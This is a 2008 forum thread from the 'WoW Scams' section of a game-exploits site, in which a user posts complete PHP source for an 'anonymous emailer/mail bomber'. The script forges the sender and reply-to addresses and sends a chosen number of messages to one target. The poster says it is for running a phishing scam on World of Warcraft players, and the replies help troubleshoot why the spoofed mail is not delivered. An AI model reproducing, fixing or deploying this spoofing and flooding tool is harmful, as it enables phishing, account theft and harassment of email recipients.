MMOwned - World of Warcraft Exploits, Hacks, Bots and Guides

Homepage Register FAQ Members Mark Forums Read Advertise Site Gear FPSOwned
Go Back   MMOwned - World of Warcraft Exploits, Hacks, Bots and Guides > World of Warcraft > WoW Scams
Reload this Page PHP Anonymous Emailer-Mail Bomber script
WoW Scams World of Warcraft Scamming Methods ONLY.
[NO QUESTIONS HERE]

Reply
 
LinkBack Thread Tools
PHP Anonymous Emailer-Mail Bomber script
(#1)
Old
justsum1's Avatar
justsum1 is Offline
Sergeant
Rep Power: 2
Reputation: 9
justsum1 is an unknown quantity at this point
 
Posts: 41
Join Date: Feb 2007
Location: NEW ZEALAND
PHP Anonymous Emailer-Mail Bomber script - 01-18-2008

***First of all i would like to make it clear that i did not script this code myself but got it off another site.

Lately i have been trying to get a working PHP Anonymous Emailer-Mail Bomber to send emails on my website since the one posted in this thread... [Only registered and activated users can see links. ] has been taken down.

Now I uploaded the script below to my webpage as a php, and tryed to use it but for some reason the emails that I sent never got delivered. I know that my host supports php and allows the sending of emails.

Furthermore, the reason i want to get this anonymous emailer up is so that i can use the scam that is posted above, which had the greatest success rate for me since it having the reply-to feature.

Im not sure, but it may be possible that some email services have blocked emails like the ones sent by the emailer including Gmail and Hotmail (the ones ive tested).

Script in php>>>
Code:
<html>
<head>
  <title>PHP Anonymous Emailer/Mail Bomber</title>
<body bgcolor="black" text="white">
<form action="" method="post">
<br><font size="5" face="verdana">Sender Details</font><br><br>
   <font size="2" face="verdana"><b>Name:</b></font><br>
    <input name="from_name" type="text" value="" size="50">
    <br><br>
    <font size="2" face="verdana"><b>Email Adress:</b></font><br>
    <input name="from_mail" type="text" value="" size="50">
<br>
<br>
    <font size="2" face="verdana"><b>Reply Adress:</b></font><br>
    <input name="email_return" type="text" value="" size="50">
<br>
<br>
<br>
<br>
  </div>
  <font size="5" face="verdana">Recipient Details</font><br><br>
  <font size="2" face="verdana"><b>Recipient Email:</b></font<br>
    <input name="target" type="text" size="50">
<br>
<br>
    <font size="2" face="verdana"><b>Subject:</b></font><br>
    <input name="subject" type="text" value="" size="50">
<br>
<br>
    <font size="2" face="verdana"><b>Message:</b></font><br>
    <textarea name="message" cols="38" rows="5"></textarea>
  <br><br><font size="2" face="verdana"><b>Number Of Messages To Send</b></font><p>
    <input name="messages" type="text" id="messages" value="" size="15">
<br>
<br>
    <input type=submit>
  </p>
</form>
   <?php
       $header="From:$from_name<$from_mail>\n";
       $header .= "Reply-To:$email_return\n";
       $message2 = stripcslashes($message);
       for($x=1;$x<$messages+1;$x++){
        mail($target,$subject,$message2,$header);
       }
   ?>


Reply With Quote

Donate to remove ads.
(#2)
Old
unknwn is Offline
Site n00b.. (A leecher if I've been here for more than a month and can't earn 5 rep)
Rep Power: 0
Reputation: 1
unknwn is an unknown quantity at this point
 
Posts: 3
Join Date: Apr 2007
01-18-2008

try to connect with telnet to the smtp server of your host and try to manual send a mail with commandline
Reply With Quote
(#3)
Old
Stew's Avatar
Stew is Offline
Site Donator
Rep Power: 1
Reputation: 37
Stew is on a distinguished road
 
Posts: 159
Join Date: Sep 2007
01-19-2008

its also possible that somewhere along the line one of the mail servers tries to validate where it came from, fails and dumps the email, i've seen it happen a lot when trying to sent to hotmail addresses
Reply With Quote
(#4)
Old
Alucard805's Avatar
Alucard805 is Offline
Master Sergeant
Rep Power: 1
Reputation: 19
Alucard805 is on a distinguished road
 
Posts: 83
Join Date: Jan 2008
Location: That One Place
01-20-2008

hmm, didnt work for me, ill look into it. I try and copy paste but its not working xD
Reply With Quote
(#5)
Old
Alucard805's Avatar
Alucard805 is Offline
Master Sergeant
Rep Power: 1
Reputation: 19
Alucard805 is on a distinguished road
 
Posts: 83
Join Date: Jan 2008
Location: That One Place
01-20-2008

hmm, didnt work for me, ill look into it. I try and copy paste but its not working xD
Reply With Quote
(#6)
Old
[F]ear's Avatar
[F]ear is Offline
Knight-Lieutenant
Rep Power: 1
Reputation: 68
[F]ear will become famous soon enough
 
Posts: 244
Join Date: Jan 2008
Location: Heaven
01-20-2008

Didn't work here either.
Reply With Quote
Reply

Donate to remove ads.

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On


Click here for your favorite eBay items



Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO 3.1.0
vBulletin Skin developed by: vBStyles.com


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281